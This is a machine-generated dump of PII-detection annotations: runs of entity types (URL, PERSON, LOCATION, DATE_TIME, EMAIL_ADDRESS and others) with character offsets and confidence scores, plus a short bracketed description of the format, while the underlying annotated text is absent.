score: 0.85, type: DATE_TIME, start: 20530, end: 20547, score: 0.85, type: DATE_TIME, start: 20573, end: 20590, score: 0.85, type: PERSON, start: 20896, end: 20934, score: 0.85, type: DATE_TIME, start: 21426, end: 21443, score: 0.85, type: DATE_TIME, start: 21469, end: 21486, score: 0.85, type: LOCATION, start: 21723, end: 21758, score: 0.85, type: LOCATION, start: 22336, end: 22371, score: 0.85, type: LOCATION, start: 23273, end: 23308, score: 0.85, type: DATE_TIME, start: 24760, end: 24777, score: 0.85, type: DATE_TIME, start: 24803, end: 24820, score: 0.85, type: LOCATION, start: 25165, end: 25200, score: 0.85, type: DATE_TIME, start: 25783, end: 25800, score: 0.85, type: DATE_TIME, start: 25826, end: 25843, score: 0.85, type: PERSON, start: 26171, end: 26209, score: 0.85, type: DATE_TIME, start: 26830, end: 26847, score: 0.85, type: DATE_TIME, start: 26873, end: 26890, score: 0.85, type: URL, start: 54, end: 63, score: 0.5, type: URL, start: 1236, end: 1248, score: 0.5, type: URL, start: 1283, end: 1303, score: 0.5, type: URL, start: 1367, end: 1376, score: 0.5, type: URL, start: 1539, end: 1554, score: 0.5, type: URL, start: 1754, end: 1769, score: 0.5, type: URL, start: 2062, end: 2077, score: 0.5, type: URL, start: 2210, end: 2230, score: 0.5, type: URL, start: 2292, end: 2307, score: 0.5, type: URL, start: 2607, end: 2622, score: 0.5, type: URL, start: 2708, end: 2714, score: 0.5, type: URL, start: 2722, end: 2728, score: 0.5, type: URL, start: 3047, end: 3054, score: 0.5, type: URL, start: 3376, end: 3383, score: 0.5, type: URL, start: 4878, end: 4885, score: 0.5, type: URL, start: 5402, end: 5409, score: 0.5, type: URL, start: 5679, end: 5688, score: 0.5, type: URL, start: 5837, end: 5844, score: 0.5, type: URL, start: 5982, end: 5991, score: 0.5, type: URL, start: 6142, end: 6149, score: 0.5, type: URL, start: 7489, end: 7509, score: 0.5, type: URL, start: 7700, end: 7709, score: 0.5, type: URL, start: 7858, end: 7865, score: 0.5, type: URL, start: 8127, end: 8136, score: 0.5, type: URL, start: 8203, end: 8210, score: 0.5, type: URL, start: 8456, end: 8465, score: 0.5, type: URL, start: 8534, end: 8541, score: 0.5, type: URL, start: 9259, end: 9268, score: 0.5, type: URL, start: 9350, end: 9357, score: 0.5, type: URL, start: 10114, end: 10123, score: 0.5, type: URL, start: 10205, end: 10212, score: 0.5, type: URL, start: 10803, end: 10812, score: 0.5, type: URL, start: 10925, end: 10932, score: 0.5, type: URL, start: 11159, end: 11168, score: 0.5, type: URL, start: 11235, end: 11242, score: 0.5, type: URL, start: 11475, end: 11484, score: 0.5, type: URL, start: 11561, end: 11568, score: 0.5, type: URL, start: 11718, end: 11727, score: 0.5, type: URL, start: 12941, end: 12961, score: 0.5, type: URL, start: 13115, end: 13122, score: 0.5, type: URL, start: 13353, end: 13362, score: 0.5, type: URL, start: 13432, end: 13439, score: 0.5, type: URL, start: 13682, end: 13691, score: 0.5, type: URL, start: 13768, end: 13775, score: 0.5, type: URL, start: 13809, end: 13818, score: 0.5, type: URL, start: 13898, end: 13905, score: 0.5, type: URL, start: 13939, end: 13948, score: 0.5, type: URL, start: 14025, end: 14032, score: 0.5, type: URL, start: 14079, end: 14086, score: 0.5, type: URL, start: 14105, end: 14112, score: 0.5, type: URL, start: 14303, end: 14312, score: 0.5, type: URL, start: 14551, end: 14565, score: 0.5, type: URL, start: 14572, end: 14584, score: 0.5, type: URL, start: 14599, end: 14613, score: 0.5, type: URL, start: 14633, end: 14640, score: 0.5, type: URL, start: 
[detected elements — flattened annotation runs for several consecutive CSV rows. Each entry has the form `type: <ENTITY>, start: <offset>, end: <offset>, score: <confidence>`; the entity types appearing in this span are URL, EMAIL_ADDRESS, IP_ADDRESS, PERSON, LOCATION, DATE_TIME, and NRP, with scores ranging from 0.5 (pattern-based matches such as URLs) up to 1.0 (exact matches such as email addresses). The start/end offsets index into each row's `content` field, which is not reproduced in this span; runs for successive rows are concatenated back to back, and a new row's run can be recognized where the offsets reset to small values.]
start: 3620, end: 3627, score: 0.5, type: URL, start: 3644, end: 3655, score: 0.5, type: URL, start: 3968, end: 3978, score: 0.5, type: URL, start: 4025, end: 4033, score: 0.5, type: URL, start: 4072, end: 4087, score: 0.5, type: URL, start: 4109, end: 4124, score: 0.5, type: URL, start: 4138, end: 4146, score: 0.5, type: URL, start: 4164, end: 4172, score: 0.5, type: URL, start: 4198, end: 4213, score: 0.5, type: URL, start: 4314, end: 4321, score: 0.5, type: URL, start: 4432, end: 4439, score: 0.5, type: URL, start: 4518, end: 4526, score: 0.5, type: URL, start: 4557, end: 4565, score: 0.5, type: URL, start: 4748, end: 4758, score: 0.5, type: URL, start: 4890, end: 4902, score: 0.5, type: URL, start: 4931, end: 4946, score: 0.5, type: URL, start: 5089, end: 5099, score: 0.5, type: URL, start: 5227, end: 5237, score: 0.5, type: URL, start: 5507, end: 5513, score: 0.5, type: URL, start: 5853, end: 5860, score: 0.5, type: URL, start: 5924, end: 5931, score: 0.5, type: URL, start: 5992, end: 5999, score: 0.5, type: URL, start: 6163, end: 6173, score: 0.5, type: URL, start: 6305, end: 6317, score: 0.5, type: URL, start: 6346, end: 6361, score: 0.5, type: URL, start: 6443, end: 6450, score: 0.5, type: URL, start: 6565, end: 6575, score: 0.5, type: URL, start: 6764, end: 6771, score: 0.5, type: URL, start: 6776, end: 6785, score: 0.5, type: URL, start: 6833, end: 6842, score: 0.5, type: URL, start: 6873, end: 6882, score: 0.5, type: URL, start: 6899, end: 6906, score: 0.5, type: URL, start: 6970, end: 6977, score: 0.5, type: URL, start: 7038, end: 7045, score: 0.5, type: URL, start: 7206, end: 7216, score: 0.5, type: URL, start: 7370, end: 7382, score: 0.5, type: URL, start: 7411, end: 7426, score: 0.5, type: URL, start: 7508, end: 7515, score: 0.5, type: URL, start: 7630, end: 7640, score: 0.5, type: URL, start: 7938, end: 7944, score: 0.5, type: URL, start: 8314, end: 8322, score: 0.5, type: URL, start: 8588, end: 8603, score: 0.5, type: URL, start: 8680, end: 8687, score: 0.5, type: URL, start: 8753, end: 8760, score: 0.5, type: URL, start: 8827, end: 8834, score: 0.5, type: URL, start: 8995, end: 9005, score: 0.5, type: URL, start: 9050, end: 9058, score: 0.5, type: URL, start: 9128, end: 9135, score: 0.5, type: URL, start: 9390, end: 9397, score: 0.5, type: URL, start: 9414, end: 9425, score: 0.5, type: URL, start: 9473, end: 9481, score: 0.5, type: URL, start: 9684, end: 9694, score: 0.5, type: URL, start: 9739, end: 9747, score: 0.5, type: URL, start: 9817, end: 9824, score: 0.5, type: URL, start: 10014, end: 10021, score: 0.5, type: URL, start: 10038, end: 10049, score: 0.5, type: URL, start: 10126, end: 10133, score: 0.5, type: URL, start: 10231, end: 10238, score: 0.5, type: URL, start: 10255, end: 10266, score: 0.5, type: URL, start: 10464, end: 10474, score: 0.5, type: URL, start: 10519, end: 10527, score: 0.5, type: URL, start: 10597, end: 10604, score: 0.5, type: URL, start: 10792, end: 10799, score: 0.5, type: URL, start: 10816, end: 10827, score: 0.5, type: URL, start: 10904, end: 10911, score: 0.5, type: URL, start: 11007, end: 11014, score: 0.5, type: URL, start: 11031, end: 11042, score: 0.5, type: URL, start: 11254, end: 11260, score: 0.5, type: URL, start: 11274, end: 11280, score: 0.5, type: URL, start: 11316, end: 11322, score: 0.5, type: URL, start: 11361, end: 11367, score: 0.5, type: URL, start: 11406, end: 11412, score: 0.5, type: URL, start: 11590, end: 11599, score: 0.5, type: URL, start: 11686, end: 11695, score: 0.5, type: URL, start: 11774, end: 11781, score: 
0.5, type: URL, start: 11866, end: 11873, score: 0.5, type: URL, start: 11881, end: 11899, score: 0.5, type: URL, start: 11989, end: 12010, score: 0.5, type: URL, start: 12219, end: 12226, score: 0.5, type: URL, start: 12231, end: 12240, score: 0.5, type: URL, start: 12286, end: 12295, score: 0.5, type: URL, start: 12324, end: 12333, score: 0.5, type: URL, start: 12376, end: 12391, score: 0.5, type: URL, start: 12608, end: 12614, score: 0.5, type: URL, start: 12766, end: 12772, score: 0.5, type: URL, start: 12848, end: 12867, score: 0.5, type: URL, start: 12970, end: 12977, score: 0.5, type: URL, start: 12989, end: 13004, score: 0.5, type: URL, start: 13157, end: 13166, score: 0.5, type: URL, start: 13253, end: 13262, score: 0.5, type: URL, start: 13341, end: 13348, score: 0.5, type: URL, start: 13433, end: 13440, score: 0.5, type: URL, start: 13448, end: 13466, score: 0.5, type: URL, start: 13556, end: 13577, score: 0.5, type: URL, start: 13786, end: 13793, score: 0.5, type: URL, start: 13798, end: 13807, score: 0.5, type: URL, start: 13853, end: 13862, score: 0.5, type: URL, start: 13891, end: 13900, score: 0.5, type: URL, start: 13943, end: 13958, score: 0.5, type: URL, start: 14175, end: 14181, score: 0.5, type: URL, start: 14333, end: 14339, score: 0.5, type: URL, start: 14415, end: 14434, score: 0.5, type: URL, start: 14537, end: 14544, score: 0.5, type: URL, start: 14556, end: 14571, score: 0.5, type: URL, start: 14595, end: 14605, score: 0.5, type: URL, start: 14878, end: 14890, score: 0.5, type: URL, start: 14903, end: 14915, score: 0.5, type: URL, start: 14942, end: 14954, score: 0.5, type: URL, start: 14970, end: 14982, score: 0.5, type: EMAIL_ADDRESS, start: 62, end: 77, score: 1.0, type: DATE_TIME, start: 34, end: 43, score: 0.85, type: PERSON, start: 44, end: 61, score: 0.85, type: URL, start: 675, end: 703, score: 0.6, type: URL, start: 68, end: 77, score: 0.5, type: URL, start: 1865, end: 1872, score: 0.5, type: EMAIL_ADDRESS, start: 165, end: 180, score: 1.0, type: PERSON, start: 78, end: 88, score: 0.85, type: DATE_TIME, start: 121, end: 130, score: 0.85, type: PERSON, start: 233, end: 239, score: 0.85, type: URL, start: 975, end: 982, score: 0.85, type: URL, start: 1144, end: 1151, score: 0.85, type: URL, start: 1170, end: 1177, score: 0.85, type: URL, start: 1565, end: 1572, score: 0.85, type: URL, start: 1591, end: 1599, score: 0.85, type: PERSON, start: 1898, end: 1922, score: 0.85, type: URL, start: 171, end: 180, score: 0.5, type: URL, start: 311, end: 320, score: 0.5, type: URL, start: 455, end: 470, score: 0.5, type: URL, start: 1223, end: 1231, score: 0.5, type: URL, start: 1264, end: 1271, score: 0.5, type: URL, start: 1297, end: 1304, score: 0.5, type: URL, start: 1346, end: 1353, score: 0.5, type: URL, start: 1462, end: 1469, score: 0.5, type: URL, start: 1632, end: 1639, score: 0.5, type: URL, start: 1669, end: 1676, score: 0.5, type: URL, start: 2018, end: 2025, score: 0.5, type: URL, start: 2043, end: 2050, score: 0.5, type: URL, start: 2258, end: 2265, score: 0.5, type: URL, start: 2285, end: 2292, score: 0.5, type: URL, start: 2341, end: 2348, score: 0.5, type: URL, start: 2543, end: 2550, score: 0.5, type: URL, start: 2665, end: 2672, score: 0.5, type: URL, start: 2706, end: 2713, score: 0.5, type: URL, start: 2745, end: 2752, score: 0.5, type: URL, start: 2834, end: 2842, score: 0.5, type: URL, start: 2876, end: 2883, score: 0.5, type: URL, start: 2910, end: 2917, score: 0.5, type: EMAIL_ADDRESS, start: 2816, end: 2831, score: 1.0, type: EMAIL_ADDRESS, 
start: 3622, end: 3637, score: 1.0, type: PERSON, start: 623, end: 627, score: 0.85, type: LOCATION, start: 832, end: 846, score: 0.85, type: PERSON, start: 1478, end: 1486, score: 0.85, type: PERSON, start: 1713, end: 1753, score: 0.85, type: PERSON, start: 1763, end: 1767, score: 0.85, type: PERSON, start: 1828, end: 1841, score: 0.85, type: PERSON, start: 2090, end: 2104, score: 0.85, type: PERSON, start: 2590, end: 2604, score: 0.85, type: PERSON, start: 2706, end: 2719, score: 0.85, type: LOCATION, start: 2981, end: 2987, score: 0.85, type: PERSON, start: 3028, end: 3041, score: 0.85, type: NRP, start: 3778, end: 3784, score: 0.85, type: PERSON, start: 4017, end: 4031, score: 0.85, type: PERSON, start: 4117, end: 4130, score: 0.85, type: URL, start: 31, end: 37, score: 0.5, type: URL, start: 127, end: 134, score: 0.5, type: URL, start: 138, end: 143, score: 0.5, type: URL, start: 148, end: 159, score: 0.5, type: URL, start: 165, end: 172, score: 0.5, type: URL, start: 214, end: 221, score: 0.5, type: URL, start: 380, end: 387, score: 0.5, type: URL, start: 391, end: 396, score: 0.5, type: URL, start: 401, end: 412, score: 0.5, type: URL, start: 419, end: 426, score: 0.5, type: URL, start: 643, end: 650, score: 0.5, type: URL, start: 690, end: 697, score: 0.5, type: URL, start: 787, end: 794, score: 0.5, type: URL, start: 853, end: 860, score: 0.5, type: URL, start: 913, end: 920, score: 0.5, type: URL, start: 989, end: 996, score: 0.5, type: URL, start: 1060, end: 1067, score: 0.5, type: URL, start: 1127, end: 1134, score: 0.5, type: URL, start: 1154, end: 1161, score: 0.5, type: URL, start: 1236, end: 1243, score: 0.5, type: URL, start: 1413, end: 1420, score: 0.5, type: URL, start: 1541, end: 1548, score: 0.5, type: URL, start: 1725, end: 1736, score: 0.5, type: URL, start: 1793, end: 1798, score: 0.5, type: URL, start: 1828, end: 1833, score: 0.5, type: URL, start: 1986, end: 1991, score: 0.5, type: URL, start: 2033, end: 2038, score: 0.5, type: URL, start: 2076, end: 2083, score: 0.5, type: URL, start: 2090, end: 2095, score: 0.5, type: URL, start: 2134, end: 2141, score: 0.5, type: URL, start: 2148, end: 2153, score: 0.5, type: URL, start: 2207, end: 2214, score: 0.5, type: URL, start: 2221, end: 2226, score: 0.5, type: URL, start: 2280, end: 2287, score: 0.5, type: URL, start: 2340, end: 2351, score: 0.5, type: URL, start: 2387, end: 2392, score: 0.5, type: URL, start: 2425, end: 2434, score: 0.5, type: URL, start: 2590, end: 2599, score: 0.5, type: URL, start: 2634, end: 2641, score: 0.5, type: URL, start: 2648, end: 2657, score: 0.5, type: URL, start: 2692, end: 2699, score: 0.5, type: URL, start: 2706, end: 2715, score: 0.5, type: URL, start: 2746, end: 2753, score: 0.5, type: URL, start: 2802, end: 2813, score: 0.5, type: URL, start: 2822, end: 2831, score: 0.5, type: URL, start: 2997, end: 3002, score: 0.5, type: URL, start: 3028, end: 3033, score: 0.5, type: URL, start: 3364, end: 3371, score: 0.5, type: URL, start: 3376, end: 3383, score: 0.5, type: URL, start: 3497, end: 3504, score: 0.5, type: URL, start: 3509, end: 3516, score: 0.5, type: URL, start: 3523, end: 3528, score: 0.5, type: URL, start: 3608, end: 3619, score: 0.5, type: URL, start: 3628, end: 3637, score: 0.5, type: URL, start: 3798, end: 3803, score: 0.5, type: URL, start: 3831, end: 3840, score: 0.5, type: URL, start: 4017, end: 4026, score: 0.5, type: URL, start: 4053, end: 4060, score: 0.5, type: URL, start: 4067, end: 4076, score: 0.5, type: URL, start: 4103, end: 4110, score: 0.5, type: URL, start: 
4117, end: 4126, score: 0.5, type: URL, start: 4156, end: 4163, score: 0.5, type: URL, start: 4239, end: 4246, score: 0.5, type: EMAIL_ADDRESS, start: 575, end: 590, score: 1.0, type: EMAIL_ADDRESS, start: 631, end: 646, score: 1.0, type: EMAIL_ADDRESS, start: 694, end: 709, score: 1.0, type: EMAIL_ADDRESS, start: 750, end: 765, score: 1.0, type: NRP, start: 267, end: 269, score: 0.85, type: LOCATION, start: 455, end: 462, score: 0.85, type: PERSON, start: 664, end: 716, score: 0.85, type: URL, start: 806, end: 813, score: 0.85, type: URL, start: 870, end: 877, score: 0.85, type: URL, start: 941, end: 948, score: 0.85, type: LOCATION, start: 2209, end: 2211, score: 0.85, type: LOCATION, start: 2413, end: 2417, score: 0.85, type: LOCATION, start: 3204, end: 3206, score: 0.85, type: URL, start: 4762, end: 4773, score: 0.85, type: URL, start: 4839, end: 4861, score: 0.85, type: LOCATION, start: 6366, end: 6368, score: 0.85, type: US_DRIVER_LICENSE, start: 4032, end: 4034, score: 0.6499999999999999, type: URL, start: 4483, end: 4558, score: 0.6, type: URL, start: 137, end: 146, score: 0.5, type: URL, start: 161, end: 170, score: 0.5, type: URL, start: 205, end: 224, score: 0.5, type: URL, start: 475, end: 494, score: 0.5, type: URL, start: 566, end: 572, score: 0.5, type: URL, start: 581, end: 590, score: 0.5, type: URL, start: 608, end: 615, score: 0.5, type: URL, start: 622, end: 628, score: 0.5, type: URL, start: 637, end: 646, score: 0.5, type: URL, start: 664, end: 671, score: 0.5, type: URL, start: 685, end: 691, score: 0.5, type: URL, start: 700, end: 709, score: 0.5, type: URL, start: 741, end: 747, score: 0.5, type: URL, start: 756, end: 765, score: 0.5, type: URL, start: 1041, end: 1048, score: 0.5, type: URL, start: 1058, end: 1065, score: 0.5, type: URL, start: 1093, end: 1112, score: 0.5, type: URL, start: 1172, end: 1186, score: 0.5, type: URL, start: 1207, end: 1226, score: 0.5, type: URL, start: 1270, end: 1284, score: 0.5, type: URL, start: 1340, end: 1354, score: 0.5, type: URL, start: 1367, end: 1373, score: 0.5, type: URL, start: 1404, end: 1418, score: 0.5, type: URL, start: 1431, end: 1437, score: 0.5, type: URL, start: 1569, end: 1588, score: 0.5, type: URL, start: 1746, end: 1753, score: 0.5, type: URL, start: 1785, end: 1792, score: 0.5, type: URL, start: 2065, end: 2074, score: 0.5, type: URL, start: 2103, end: 2110, score: 0.5, type: URL, start: 2144, end: 2160, score: 0.5, type: URL, start: 2178, end: 2185, score: 0.5, type: URL, start: 2193, end: 2200, score: 0.5, type: URL, start: 2466, end: 2473, score: 0.5, type: URL, start: 2487, end: 2494, score: 0.5, type: URL, start: 2509, end: 2518, score: 0.5, type: URL, start: 2520, end: 2528, score: 0.5, type: URL, start: 2561, end: 2568, score: 0.5, type: URL, start: 2829, end: 2836, score: 0.5, type: URL, start: 2869, end: 2876, score: 0.5, type: URL, start: 2907, end: 2914, score: 0.5, type: URL, start: 3162, end: 3169, score: 0.5, type: URL, start: 3229, end: 3240, score: 0.5, type: URL, start: 3375, end: 3386, score: 0.5, type: URL, start: 3692, end: 3714, score: 0.5, type: URL, start: 3749, end: 3753, score: 0.5, type: URL, start: 3831, end: 3838, score: 0.5, type: URL, start: 3862, end: 3869, score: 0.5, type: URL, start: 3951, end: 3958, score: 0.5, type: URL, start: 3965, end: 3972, score: 0.5, type: URL, start: 4202, end: 4216, score: 0.5, type: URL, start: 4270, end: 4281, score: 0.5, type: URL, start: 4346, end: 4368, score: 0.5, type: URL, start: 4578, end: 4582, score: 0.5, type: URL, start: 4896, end: 
4900, score: 0.5, type: URL, start: 5350, end: 5357, score: 0.5, type: URL, start: 5385, end: 5392, score: 0.5, type: URL, start: 5531, end: 5538, score: 0.5, type: URL, start: 5617, end: 5626, score: 0.5, type: URL, start: 5656, end: 5678, score: 0.5, type: URL, start: 5717, end: 5721, score: 0.5, type: URL, start: 5799, end: 5818, score: 0.5, type: URL, start: 5936, end: 5953, score: 0.5, type: URL, start: 5986, end: 5995, score: 0.5, type: URL, start: 6021, end: 6043, score: 0.5, type: URL, start: 6078, end: 6082, score: 0.5, type: DATE_TIME, start: 20, end: 29, score: 0.85, type: PERSON, start: 90, end: 100, score: 0.85, type: PERSON, start: 105, end: 115, score: 0.85, type: PERSON, start: 129, end: 139, score: 0.85, type: PERSON, start: 141, end: 153, score: 0.85, type: PERSON, start: 155, end: 165, score: 0.85, type: PERSON, start: 205, end: 222, score: 0.85, type: PERSON, start: 224, end: 238, score: 0.85, type: LOCATION, start: 1004, end: 1031, score: 0.85, type: LOCATION, start: 1073, end: 1075, score: 0.85, type: PERSON, start: 1267, end: 1285, score: 0.85, type: PERSON, start: 1594, end: 1626, score: 0.85, type: LOCATION, start: 2227, end: 2230, score: 0.85, type: LOCATION, start: 2232, end: 2235, score: 0.85, type: LOCATION, start: 2237, end: 2240, score: 0.85, type: LOCATION, start: 3897, end: 3900, score: 0.85, type: LOCATION, start: 3902, end: 3905, score: 0.85, type: PERSON, start: 3975, end: 3990, score: 0.85, type: LOCATION, start: 4158, end: 4161, score: 0.85, type: LOCATION, start: 4163, end: 4166, score: 0.85, type: LOCATION, start: 4242, end: 4245, score: 0.85, type: LOCATION, start: 4247, end: 4250, score: 0.85, type: URL, start: 432, end: 474, score: 0.6, type: IP_ADDRESS, start: 1276, end: 1285, score: 0.6, type: URL, start: 892, end: 900, score: 0.5, type: URL, start: 904, end: 912, score: 0.5, type: URL, start: 926, end: 943, score: 0.5, type: URL, start: 965, end: 982, score: 0.5, type: URL, start: 1004, end: 1021, score: 0.5, type: URL, start: 1110, end: 1121, score: 0.5, type: URL, start: 1136, end: 1145, score: 0.5, type: URL, start: 1178, end: 1187, score: 0.5, type: URL, start: 1233, end: 1242, score: 0.5, type: URL, start: 1305, end: 1314, score: 0.5, type: URL, start: 1336, end: 1343, score: 0.5, type: URL, start: 1361, end: 1368, score: 0.5, type: URL, start: 1514, end: 1520, score: 0.5, type: URL, start: 1925, end: 1930, score: 0.5, type: URL, start: 2186, end: 2191, score: 0.5, type: URL, start: 2473, end: 2481, score: 0.5, type: URL, start: 2503, end: 2508, score: 0.5, type: URL, start: 2670, end: 2709, score: 0.5, type: URL, start: 3286, end: 3291, score: 0.5, type: URL, start: 3526, end: 3534, score: 0.5, type: URL, start: 3556, end: 3561, score: 0.5, type: URL, start: 3859, end: 3864, score: 0.5, type: URL, start: 3993, end: 4001, score: 0.5, type: URL, start: 4022, end: 4027, score: 0.5, type: URL, start: 4120, end: 4125, score: 0.5, type: URL, start: 4227, end: 4232, score: 0.5, type: EMAIL_ADDRESS, start: 138, end: 153, score: 1.0, type: PERSON, start: 124, end: 137, score: 0.85, type: PERSON, start: 669, end: 681, score: 0.85, type: PERSON, start: 890, end: 893, score: 0.85, type: PERSON, start: 935, end: 938, score: 0.85, type: PERSON, start: 7438, end: 7457, score: 0.85, type: IP_ADDRESS, start: 39, end: 40, score: 0.6, type: IP_ADDRESS, start: 121, end: 124, score: 0.6, type: URL, start: 144, end: 153, score: 0.5, type: URL, start: 2525, end: 2538, score: 0.5, type: URL, start: 3077, end: 3081, score: 0.5, type: URL, start: 3101, end: 3105, 
score: 0.5, type: URL, start: 3166, end: 3170, score: 0.5, type: URL, start: 5846, end: 5853, score: 0.5, type: URL, start: 6579, end: 6586, score: 0.5, type: URL, start: 7802, end: 7809, score: 0.5, type: URL, start: 8178, end: 8189, score: 0.5, type: URL, start: 8597, end: 8604, score: 0.5, type: URL, start: 9181, end: 9188, score: 0.5, type: URL, start: 9247, end: 9255, score: 0.5, type: URL, start: 9744, end: 9751, score: 0.5, type: URL, start: 9810, end: 9818, score: 0.5, type: URL, start: 11265, end: 11272, score: 0.5, type: URL, start: 11755, end: 11759, score: 0.5, type: URL, start: 11807, end: 11811, score: 0.5, type: URL, start: 12280, end: 12294, score: 0.5, type: URL, start: 12347, end: 12361, score: 0.5, type: URL, start: 12389, end: 12403, score: 0.5, type: URL, start: 12497, end: 12506, score: 0.5, type: URL, start: 13040, end: 13044, score: 0.5, type: URL, start: 13092, end: 13096, score: 0.5, type: URL, start: 13537, end: 13544, score: 0.5, type: URL, start: 13620, end: 13627, score: 0.5, type: URL, start: 13702, end: 13709, score: 0.5, type: UK_NHS, start: 3250, end: 3260, score: 1.0, type: PERSON, start: 124, end: 133, score: 0.85, type: PERSON, start: 367, end: 377, score: 0.85, type: PERSON, start: 1184, end: 1193, score: 0.85, type: LOCATION, start: 1195, end: 1198, score: 0.85, type: LOCATION, start: 1278, end: 1281, score: 0.85, type: PERSON, start: 1700, end: 1704, score: 0.85, type: PERSON, start: 2112, end: 2116, score: 0.85, type: LOCATION, start: 2560, end: 2580, score: 0.85, type: PERSON, start: 2696, end: 2717, score: 0.85, type: NRP, start: 2724, end: 2745, score: 0.85, type: LOCATION, start: 3071, end: 3081, score: 0.85, type: PERSON, start: 3547, end: 3562, score: 0.85, type: DATE_TIME, start: 4153, end: 4162, score: 0.85, type: LOCATION, start: 4840, end: 4856, score: 0.85, type: PERSON, start: 4986, end: 4997, score: 0.85, type: PERSON, start: 5420, end: 5431, score: 0.85, type: PERSON, start: 5868, end: 5879, score: 0.85, type: PERSON, start: 6318, end: 6329, score: 0.85, type: PERSON, start: 6478, end: 6481, score: 0.85, type: PERSON, start: 6891, end: 6902, score: 0.85, type: PERSON, start: 7051, end: 7054, score: 0.85, type: PERSON, start: 8277, end: 8291, score: 0.85, type: PERSON, start: 8961, end: 8968, score: 0.85, type: LOCATION, start: 9117, end: 9125, score: 0.85, type: LOCATION, start: 10149, end: 10171, score: 0.85, type: PERSON, start: 11791, end: 11802, score: 0.85, type: PERSON, start: 12663, end: 12671, score: 0.85, type: PERSON, start: 13615, end: 13618, score: 0.85, type: LOCATION, start: 13947, end: 13969, score: 0.85, type: PERSON, start: 15989, end: 16020, score: 0.85, type: PERSON, start: 16106, end: 16109, score: 0.85, type: PERSON, start: 16176, end: 16180, score: 0.85, type: PERSON, start: 16191, end: 16210, score: 0.85, type: PERSON, start: 16466, end: 16472, score: 0.85, type: PERSON, start: 16966, end: 16972, score: 0.85, type: PERSON, start: 17624, end: 17628, score: 0.85, type: LOCATION, start: 17790, end: 17819, score: 0.85, type: LOCATION, start: 17922, end: 17952, score: 0.85, type: LOCATION, start: 18367, end: 18398, score: 0.85, type: LOCATION, start: 19185, end: 19216, score: 0.85, type: LOCATION, start: 19542, end: 19573, score: 0.85, type: LOCATION, start: 20229, end: 20260, score: 0.85, type: NRP, start: 22534, end: 22541, score: 0.85, type: LOCATION, start: 22646, end: 22654, score: 0.85, type: PERSON, start: 22669, end: 22685, score: 0.85, type: PERSON, start: 23821, end: 23853, score: 0.85, type: LOCATION, 
start: 24512, end: 24535, score: 0.85, type: PERSON, start: 26412, end: 26420, score: 0.85, type: LOCATION, start: 26549, end: 26553, score: 0.85, type: PERSON, start: 26736, end: 26747, score: 0.85, type: URL, start: 239, end: 249, score: 0.5, type: URL, start: 601, end: 621, score: 0.5, type: URL, start: 636, end: 651, score: 0.5, type: URL, start: 686, end: 706, score: 0.5, type: URL, start: 739, end: 756, score: 0.5, type: URL, start: 1437, end: 1441, score: 0.5, type: URL, start: 1475, end: 1479, score: 0.5, type: URL, start: 1793, end: 1798, score: 0.5, type: URL, start: 1807, end: 1812, score: 0.5, type: URL, start: 1852, end: 1862, score: 0.5, type: URL, start: 2160, end: 2166, score: 0.5, type: URL, start: 2228, end: 2233, score: 0.5, type: URL, start: 2524, end: 2535, score: 0.5, type: URL, start: 2560, end: 2570, score: 0.5, type: URL, start: 2796, end: 2802, score: 0.5, type: URL, start: 2852, end: 2858, score: 0.5, type: URL, start: 2905, end: 2911, score: 0.5, type: URL, start: 2937, end: 2951, score: 0.5, type: URL, start: 2966, end: 2972, score: 0.5, type: URL, start: 3149, end: 3162, score: 0.5, type: URL, start: 3299, end: 3310, score: 0.5, type: URL, start: 3543, end: 3549, score: 0.5, type: URL, start: 3569, end: 3573, score: 0.5, type: URL, start: 3588, end: 3602, score: 0.5, type: URL, start: 3608, end: 3612, score: 0.5, type: URL, start: 3918, end: 3924, score: 0.5, type: URL, start: 3988, end: 4002, score: 0.5, type: URL, start: 4092, end: 4106, score: 0.5, type: URL, start: 4197, end: 4203, score: 0.5, type: URL, start: 4342, end: 4348, score: 0.5, type: URL, start: 4377, end: 4391, score: 0.5, type: URL, start: 4415, end: 4421, score: 0.5, type: URL, start: 4559, end: 4566, score: 0.5, type: URL, start: 4590, end: 4604, score: 0.5, type: URL, start: 4634, end: 4648, score: 0.5, type: URL, start: 4683, end: 4690, score: 0.5, type: URL, start: 4772, end: 4786, score: 0.5, type: URL, start: 4795, end: 4802, score: 0.5, type: URL, start: 4840, end: 4847, score: 0.5, type: URL, start: 4897, end: 4908, score: 0.5, type: URL, start: 4948, end: 4959, score: 0.5, type: URL, start: 5031, end: 5037, score: 0.5, type: URL, start: 5067, end: 5081, score: 0.5, type: URL, start: 5231, end: 5237, score: 0.5, type: URL, start: 5331, end: 5342, score: 0.5, type: URL, start: 5382, end: 5393, score: 0.5, type: URL, start: 5472, end: 5478, score: 0.5, type: URL, start: 5508, end: 5522, score: 0.5, type: URL, start: 5679, end: 5685, score: 0.5, type: URL, start: 5779, end: 5790, score: 0.5, type: URL, start: 5830, end: 5841, score: 0.5, type: URL, start: 5913, end: 5919, score: 0.5, type: URL, start: 5949, end: 5963, score: 0.5, type: URL, start: 6129, end: 6135, score: 0.5, type: URL, start: 6229, end: 6240, score: 0.5, type: URL, start: 6280, end: 6291, score: 0.5, type: URL, start: 6363, end: 6369, score: 0.5, type: URL, start: 6399, end: 6413, score: 0.5, type: URL, start: 6467, end: 6481, score: 0.5, type: URL, start: 6583, end: 6594, score: 0.5, type: URL, start: 6615, end: 6621, score: 0.5, type: URL, start: 6768, end: 6773, score: 0.5, type: URL, start: 6802, end: 6813, score: 0.5, type: URL, start: 6853, end: 6864, score: 0.5, type: URL, start: 6936, end: 6942, score: 0.5, type: URL, start: 6972, end: 6986, score: 0.5, type: URL, start: 7040, end: 7054, score: 0.5, type: URL, start: 7156, end: 7167, score: 0.5, type: URL, start: 7188, end: 7194, score: 0.5, type: URL, start: 7306, end: 7317, score: 0.5, type: URL, start: 7363, end: 7374, score: 0.5, type: URL, start: 7447, 
